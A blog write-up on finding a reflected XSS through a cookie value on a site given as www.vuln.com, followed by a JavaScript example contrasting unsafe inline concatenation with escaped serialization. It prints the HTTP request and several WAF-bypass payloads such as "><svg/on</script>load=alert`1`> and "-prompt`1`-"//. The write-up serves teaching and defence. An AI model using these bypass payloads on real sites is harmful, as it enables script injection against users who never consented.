XSS “403 forbidden” bypass write up

Nur A Alam Dipu
Apr 25, 2018 · 3 min read

Hello,

This is my second blog post and my first write-up about XSS. I think there is nothing new here that you can learn. If you read the "akita" or "rahul-maini" blogs you can learn more than this. This is just a part of what I learned from those write-up posts.

Okay, let's start.

Recently I found a cookie injection in a private site that reflected something from a cookie parameter.

In the regular way I checked all the parameters, inputting something like "xxxx". I noticed in Burp Repeater that the cookie "GA_countryCode=xxx" was reflected in a code function.

GET /my/refer/welcome?rt=6bjzl0zEmBiPl0IQRSeN&cid=111&channel=1151 HTTP/1.1
Host: www.vuln.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: RT=6bjzl0zEmBiPl0IQRSeN5wxxx; GA_countryCode=GBxxxxxx"; GA_currentDomain=www.vuln.co.uk; feature_rollercoaster_upload=0; ABTasty=uid%3D18042509351658083%26fst%3D1524627317406%26pst%3Dnull%26cst%3D1524627317406%26ns%3D1%26pvt%3D1%26pvis%3D1%26th%3D;

'session_status' : "session_defined",
'page_name' : pageName,
'page_category' : 'My Account',
'country_code' : "GBxxxxxx",
'ua' : "UA-48172145-1",
'current_domain' : window.location.host,
'Cookie_Timeout' : "2592000000",
'channel_id' : "1151",

Then I checked "><svg/onload> and it was also reflected.

page_name' : pageName,
'page_category' : 'My Account',
'country_code' : "GB"><svg/onload>",
'ua' : "UA-48172145-1",
'current_domain' : window.location.host,
'Cookie_Timeout' : "2592000000",
'channel_id' : "1151"

Now the problem came up: when I tried "><svg/onload=>, "=" was blocked.

Then I used some techniques that I learned from the brutelogic blog. I noticed alert was okay, not blocked; only "=" was blocked. Then I used a payload like "><svg/on</script>load=alert> and saw that it bypassed the filter and was reflected.

Then I tried "><svg/on</script>load=alert(1)>; the "()" brackets were blocked, so I used ``. "><svg/on</script>load=alert`1`> was fine.

But no pop-up. As all of them were bypassed, I was confident it was possible to trigger XSS. I tried many other ways to get a pop-up, but failed, because of many restrictions: "Access Denied HTTP/1.1 403 Forbidden" and IP blocking.

Then I made a shortcut payload like "-prompt`1`-"//. And it worked. :)

XSS done!!

For this simple payload, it took a long time. :(

For sure there was a possible way to bypass it with a normal payload, but I didn't try more. With less knowledge you can't think of more.
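The root cause behind the whole story is visible in the reflected snippet above: the cookie value is concatenated straight into a JavaScript object literal inside an inline script, and the 403 filter only blocks a few characters ("=", "()") at the edge instead of encoding the value at the sink. The following is an added example, not code from the original post or from the site it describes; the function names (renderConfigUnsafe, renderConfigSafe, toInlineJs, scriptCloseCount, evalPageData) and the reconstructed template are assumptions. It renders the same kind of object literal both ways and runs the post's own reflection payload through each, so you can see that the escaped version stays a single valid script whose country_code round-trips unchanged.

```javascript
// Added example, not code from the original post or the site it describes.
// It reconstructs the pattern the post shows (a cookie value dropped into a
// JavaScript object literal inside an inline <script>) beside the fix that
// makes character-blocking at a WAF unnecessary: serialize the whole object
// and escape the characters that matter in a <script> context.
// Function names and the template layout are assumptions.

// Unsafe pattern: the raw cookie value is concatenated into the literal, so
// a value containing a double quote ends the string early, and a value
// containing </script> ends the whole script element.
function renderConfigUnsafe(countryCode) {
  return [
    '<script>',
    'var pageData = {',
    "  'page_category' : 'My Account',",
    "  'country_code' : \"" + countryCode + '",',
    "  'channel_id' : \"1151\"",
    '};',
    '</script>',
  ].join('\n');
}

// JSON.stringify already escapes double quotes and backslashes; the extra
// replacements neutralize '<' and '>' (so "</script>" can never appear in
// the output) plus the two line terminators JSON allows inside strings.
function toInlineJs(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Safe pattern: build the object server-side, serialize it once, and let the
// browser's JavaScript parser reconstruct the value.
function renderConfigSafe(countryCode) {
  const pageData = {
    page_category: 'My Account',
    country_code: countryCode,
    channel_id: '1151',
  };
  return ['<script>', 'var pageData = ' + toInlineJs(pageData) + ';', '</script>'].join('\n');
}

// Review check for rendered output: more than one "</script>" for a single
// script element means an injected value has closed the tag.
function scriptCloseCount(html) {
  return html.split('</script>').length - 1;
}

// Simulate what the browser does with the script body: evaluate it and return
// the pageData object it defines. Constructed for the example; a real page
// would read window.pageData.
function evalPageData(html) {
  const body = html.replace(/^<script>\n/, '').replace(/\n<\/script>$/, '');
  return new Function(body + '\nreturn pageData;')();
}

// Constructed input: the reflection payload quoted in the post.
const samplePayload = '"><svg/on</script>load=alert`1`>';

console.log(renderConfigUnsafe(samplePayload));
console.log('unsafe </script> count:', scriptCloseCount(renderConfigUnsafe(samplePayload)));
console.log(renderConfigSafe(samplePayload));
console.log('safe </script> count:', scriptCloseCount(renderConfigSafe(samplePayload)));
console.log('round-tripped value:', evalPageData(renderConfigSafe(samplePayload)).country_code);
```

The unsafe output contains two closing script tags and is no longer valid JavaScript, which is exactly the condition the post's payloads exploit; the safe output keeps one script element, contains no raw angle brackets, and still hands the page the original string. Blocking "=" or "()" in a request never changes that, so the encoding at the sink is what actually closes the bug.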

Sorry for my bad English.

Thanks for reading.
